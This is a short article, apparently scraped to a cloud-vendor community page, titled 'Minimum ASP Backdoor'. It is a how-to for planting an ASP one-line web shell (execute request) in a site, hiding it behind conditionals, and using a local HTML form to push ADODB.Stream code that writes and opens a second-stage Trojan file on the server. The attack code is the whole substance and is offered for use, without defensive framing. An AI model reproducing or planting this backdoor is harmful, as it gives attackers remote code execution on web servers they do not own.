Minimum ASP Backdoor _ Trojan Related

Source: Internet
Author: User
First write in ASP file such as <%execute request ("value")%> code
If you want to hide, add some if judgment statements, you can
and write a form locally.
Copy Code code as follows:

<form action=http://***.com/jb51.asp method=post>
<textarea name=value cols=120 rows=10 width=45>
Set Lp=server.createobject ("ADODB.stream")
Lp.open
lp.type=2
lp.charset= "gb2312"
Lp.writetext request ("Hackbin")
Lp.savetofile Server.MapPath ("men.asp"), 2
Lp.close
Set lp=nothing
Response.Redirect "Men.asp"
</textarea>
<textarea name=hackbin cols=120 rows=10 width=45> Add the contents of the Trojan </textarea><br><center><br > <input type=submit value= submission >

Save as HTM file, replace http://***.com/jb51.asp with the file you insert <%execute request ("value")%>, and then click Submit to jump directly to the Trojan

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.